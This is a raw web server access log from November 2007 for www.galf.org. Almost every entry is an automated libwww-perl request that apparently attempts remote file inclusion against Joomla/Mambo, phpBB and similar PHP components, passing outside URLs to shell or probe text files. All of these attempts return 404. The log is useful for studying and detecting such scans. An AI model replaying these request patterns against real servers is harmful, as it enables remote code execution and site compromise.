66.118.142.56 - - [04/Nov/2007:16:29:07 -0800] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://darka.hostinggratisargentina.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.74.15 - - [04/Nov/2007:16:30:00 -0800] "GET /logs/access_070917.log//login.php?dir=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
72.29.74.15 - - [04/Nov/2007:16:30:00 -0800] "GET /logs//login.php?dir=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.204.17.137 - - [04/Nov/2007:16:30:02 -0800] "GET /logs//administrator/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
87.204.17.137 - - [04/Nov/2007:16:30:03 -0800] "GET //administrator/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
216.174.63.40 - - [04/Nov/2007:16:30:11 -0800] "GET /logs/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.mursia.net/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
216.174.63.40 - - [04/Nov/2007:16:30:11 -0800] "GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://www.mursia.net/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
68.8.70.183 - - [04/Nov/2007:16:30:14 -0800] "GET /logs/access_070826.log/administrator/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
68.8.70.183 - - [04/Nov/2007:16:30:14 -0800] "GET /administrator/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
68.8.70.183 - - [04/Nov/2007:16:30:17 -0800] "GET /logs/administrator/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.107.35.50 - - [04/Nov/2007:16:30:27 -0800] "GET /logs/access_070917.log/administrator/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.107.35.50 - - [04/Nov/2007:16:30:28 -0800] "GET /administrator/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.107.35.50 - - [04/Nov/2007:16:30:28 -0800] "GET /logs/administrator/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
82.107.35.50 - - [04/Nov/2007:16:30:29 -0800] "GET /logs/access_070730.log/administrator/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
84.112.166.87 - - [04/Nov/2007:16:30:34 -0800] "GET /logs//administrator/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
84.112.166.87 - - [04/Nov/2007:16:30:35 -0800] "GET //administrator/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
68.8.70.183 - - [04/Nov/2007:16:30:36 -0800] "GET /logs/access_070827.log//administrator/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
75.0.141.110 - - [04/Nov/2007:16:30:43 -0800] "GET /logs/administrator/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
75.0.141.110 - - [04/Nov/2007:16:30:43 -0800] "GET /administrator/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
68.8.70.183 - - [04/Nov/2007:16:30:46 -0800] "GET //administrator/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
68.8.70.183 - - [04/Nov/2007:16:30:47 -0800] "GET /logs//administrator/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
68.8.70.183 - - [04/Nov/2007:16:30:47 -0800] "GET /logs/access_071022.log//administrator/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.107.35.50 - - [04/Nov/2007:16:31:10 -0800] "GET /logs/access_070826.log/administrator/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.107.35.50 - - [04/Nov/2007:16:31:11 -0800] "GET /administrator/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.107.35.50 - - [04/Nov/2007:16:31:11 -0800] "GET /logs/administrator/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.107.35.50 - - [04/Nov/2007:16:32:08 -0800] "GET /logs/access_071001.log/administrator/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.107.35.50 - - [04/Nov/2007:16:32:08 -0800] "GET /administrator/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.107.35.50 - - [04/Nov/2007:16:32:09 -0800] "GET /logs/administrator/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.107.35.50 - - [04/Nov/2007:16:32:25 -0800] "GET /logs/administrator/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.107.35.50 - - [04/Nov/2007:16:32:26 -0800] "GET /administrator/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.85.142.250 - - [04/Nov/2007:16:32:26 -0800] "GET //login.php?dir=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.85.142.250 - - [04/Nov/2007:16:32:26 -0800] "GET //login.php?dir=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.52.9.218 - - [04/Nov/2007:16:32:49 -0800] "GET /logs/access_070917.log//modules/agendax/addevent.inc.php?agendax_path=http://rh4m4.t35.com/s.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
74.52.9.218 - - [04/Nov/2007:16:32:49 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://rh4m4.t35.com/s.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
74.52.9.218 - - [04/Nov/2007:16:32:50 -0800] "GET /logs/access_070625.log//modules/agendax/addevent.inc.php?agendax_path=http://rh4m4.t35.com/s.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
88.45.219.178 - - [04/Nov/2007:16:34:54 -0800] "GET /logs/administrator/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.45.219.178 - - [04/Nov/2007:16:34:55 -0800] "GET /administrator/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.107.35.50 - - [04/Nov/2007:16:35:38 -0800] "GET /logs/access_070917.log/administrator/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.107.35.50 - - [04/Nov/2007:16:35:38 -0800] "GET /administrator/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
82.107.35.50 - - [04/Nov/2007:16:35:39 -0800] "GET /logs/administrator/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.107.35.50 - - [04/Nov/2007:16:36:23 -0800] "GET /logs/access_071022.log/administrator/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.214.44.193 - - [04/Nov/2007:16:37:06 -0800] "GET /logs/access_070910.log//modules/agendax/addevent.inc.php?agendax_path=http://www.zperonowki.com/html/modules/PNphpBB2/includes/r8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.44.193 - - [04/Nov/2007:16:37:06 -0800] "GET /logs/access_071008.log//modules/agendax/addevent.inc.php?agendax_path=http://www.zperonowki.com/html/modules/PNphpBB2/includes/r8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.13.65.33 - - [04/Nov/2007:16:37:15 -0800] "GET /logs/access_071008.log//administrator/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
85.13.65.33 - - [04/Nov/2007:16:37:20 -0800] "GET //administrator/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.13.65.33 - - [04/Nov/2007:16:37:25 -0800] "GET /logs//administrator/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.107.35.50 - - [04/Nov/2007:16:37:26 -0800] "GET /logs/access_070903.log/administrator/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.13.65.33 - - [04/Nov/2007:16:38:25 -0800] "GET /logs/access_071022.log//administrator/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.204.17.137 - - [04/Nov/2007:16:38:49 -0800] "GET /logs/administrator/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
87.204.17.137 - - [04/Nov/2007:16:38:50 -0800] "GET /administrator/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
72.9.146.30 - - [04/Nov/2007:16:39:11 -0800] "GET /logs/access_070702.log//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.flylink.psi.br/arquivos/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.9.146.30 - - [04/Nov/2007:16:39:11 -0800] "GET //redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.flylink.psi.br/arquivos/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.9.146.30 - - [04/Nov/2007:16:39:11 -0800] "GET /logs//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.flylink.psi.br/arquivos/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.9.146.30 - - [04/Nov/2007:16:40:09 -0800] "GET /logs/access_070625.log//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.flylink.psi.br/arquivos/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.100.8.216 - - [04/Nov/2007:16:40:47 -0800] "GET /logs/access_071014.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.freewebs.com/newila/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.100.8.216 - - [04/Nov/2007:16:40:47 -0800] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.freewebs.com/newila/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.100.8.216 - - [04/Nov/2007:16:40:48 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.freewebs.com/newila/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
68.8.70.183 - - [04/Nov/2007:16:42:10 -0800] "GET /logs/administrator/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
68.8.70.183 - - [04/Nov/2007:16:42:10 -0800] "GET /administrator/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
85.12.31.102 - - [04/Nov/2007:16:42:50 -0800] "GET /logs/access_071022.log//administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://64.8.110.2/xpl/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.209.9.68 - - [04/Nov/2007:16:42:57 -0800] "GET /logs/access_071001.log/modules/My_eGallery/index.php?basepath=http://148.245.107.2/.ssh/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
79.18.81.170 - - [04/Nov/2007:16:43:10 -0800] "GET /logs/access.log//teatro/pub/pub08_comments.php?basePath=http://lamerinside.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
79.18.81.170 - - [04/Nov/2007:16:43:11 -0800] "GET //teatro/pub/pub08_comments.php?basePath=http://lamerinside.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
79.18.81.170 - - [04/Nov/2007:16:43:11 -0800] "GET /logs//teatro/pub/pub08_comments.php?basePath=http://lamerinside.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.144.198.82 - - [04/Nov/2007:16:43:12 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
195.144.198.82 - - [04/Nov/2007:16:43:13 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
84.112.166.87 - - [04/Nov/2007:16:43:49 -0800] "GET /logs//administrator/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
84.112.166.87 - - [04/Nov/2007:16:43:50 -0800] "GET //administrator/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
85.12.31.102 - - [04/Nov/2007:16:43:57 -0800] "GET /logs/access_070903.log//administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://64.8.110.2/xpl/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.12.31.102 - - [04/Nov/2007:16:44:12 -0800] "GET /logs/access_071022.log//administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://64.8.110.2/xpl/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.100.8.216 - - [04/Nov/2007:16:44:43 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.freewebs.com/newila/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.100.8.216 - - [04/Nov/2007:16:44:43 -0800] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.freewebs.com/newila/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
206.123.116.223 - - [04/Nov/2007:16:44:57 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
206.123.116.223 - - [04/Nov/2007:16:44:57 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.85.142.250 - - [04/Nov/2007:16:45:07 -0800] "GET /logs/access_070917.log//login.php?dir=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.85.142.250 - - [04/Nov/2007:16:45:08 -0800] "GET /logs/access_070917.log//login.php?dir=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.85.142.250 - - [04/Nov/2007:16:45:08 -0800] "GET /logs//login.php?dir=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.85.142.250 - - [04/Nov/2007:16:45:08 -0800] "GET /logs//login.php?dir=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
85.12.31.102 - - [04/Nov/2007:16:45:16 -0800] "GET /logs/access_070903.log//administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://64.8.110.2/xpl/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.21.98.67 - - [04/Nov/2007:16:45:53 -0800] "GET /logs/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.sehospede.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.29.74.83 - - [04/Nov/2007:16:46:16 -0800] "GET /logs/access_070917.log//login.php?dir=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.74.83 - - [04/Nov/2007:16:46:16 -0800] "GET /logs//login.php?dir=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.85.142.250 - - [04/Nov/2007:16:46:21 -0800] "GET /logs/access_071014.log//login.php?dir=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.85.142.250 - - [04/Nov/2007:16:46:21 -0800] "GET /logs/access_071014.log//login.php?dir=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
206.123.116.223 - - [04/Nov/2007:16:46:27 -0800] "GET /logs//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
206.123.116.223 - - [04/Nov/2007:16:46:27 -0800] "GET //administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
201.216.236.100 - - [04/Nov/2007:16:46:43 -0800] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.lasexta.net/components/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
201.216.236.100 - - [04/Nov/2007:16:46:43 -0800] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.lasexta.net/components/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.112.166.87 - - [04/Nov/2007:16:47:37 -0800] "GET /logs/access_070827.log//administrator/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
151.199.7.188 - - [04/Nov/2007:16:48:07 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8"
151.199.7.188 - - [04/Nov/2007:16:48:09 -0800] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8"
151.199.7.188 - - [04/Nov/2007:16:48:12 -0800] "GET /labia/ HTTP/1.1" 200 524 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8"
208.98.1.245 - - [04/Nov/2007:16:48:12 -0800] "GET /logs/access_070723.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://miniradio.no/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
151.199.7.188 - - [04/Nov/2007:16:48:16 -0800] "GET /cendoc/ HTTP/1.1" 200 526 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8"
208.98.1.245 - - [04/Nov/2007:16:48:17 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://miniradio.no/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
208.98.1.245 - - [04/Nov/2007:16:48:18 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://miniradio.no/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.13.65.33 - - [04/Nov/2007:16:49:06 -0800] "GET /logs/access_070826.log/administrator/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.13.65.33 - - [04/Nov/2007:16:49:08 -0800] "GET /administrator/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.13.65.33 - - [04/Nov/2007:16:49:10 -0800] "GET /logs/administrator/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.lasexta.net/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.38.30.186 - - [04/Nov/2007:16:50:02 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.freewebs.com/newila/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.38.30.186 - - [04/Nov/2007:16:50:02 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.freewebs.com/newila/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.98.1.245 - - [04/Nov/2007:16:50:29 -0800] "GET /logs/scripts.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://miniradio.no/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.98.1.245 - - [04/Nov/2007:16:50:31 -0800] "GET /logs/scripts.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://miniradio.no/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.30.216.94 - - [04/Nov/2007:16:51:02 -0800] "GET /logs/access_070709.log HTTP/1.0" 200 655360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
85.214.44.193 - - [04/Nov/2007:16:52:14 -0800] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.zperonowki.com/html/modules/PNphpBB2/includes/r8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.44.193 - - [04/Nov/2007:16:52:15 -0800] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.zperonowki.com/html/modules/PNphpBB2/includes/r8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.53.32.12 - - [04/Nov/2007:16:52:20 -0800] "GET //breadcrumb.php?rootBase=http://www.mursia.net/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.118.142.56 - - [04/Nov/2007:16:52:23 -0800] "GET /logs/access_070903.log/admin/spaw/spaw_control.class.php?spaw_root=http://darka.hostinggratisargentina.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
66.118.142.56 - - [04/Nov/2007:16:52:24 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://darka.hostinggratisargentina.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
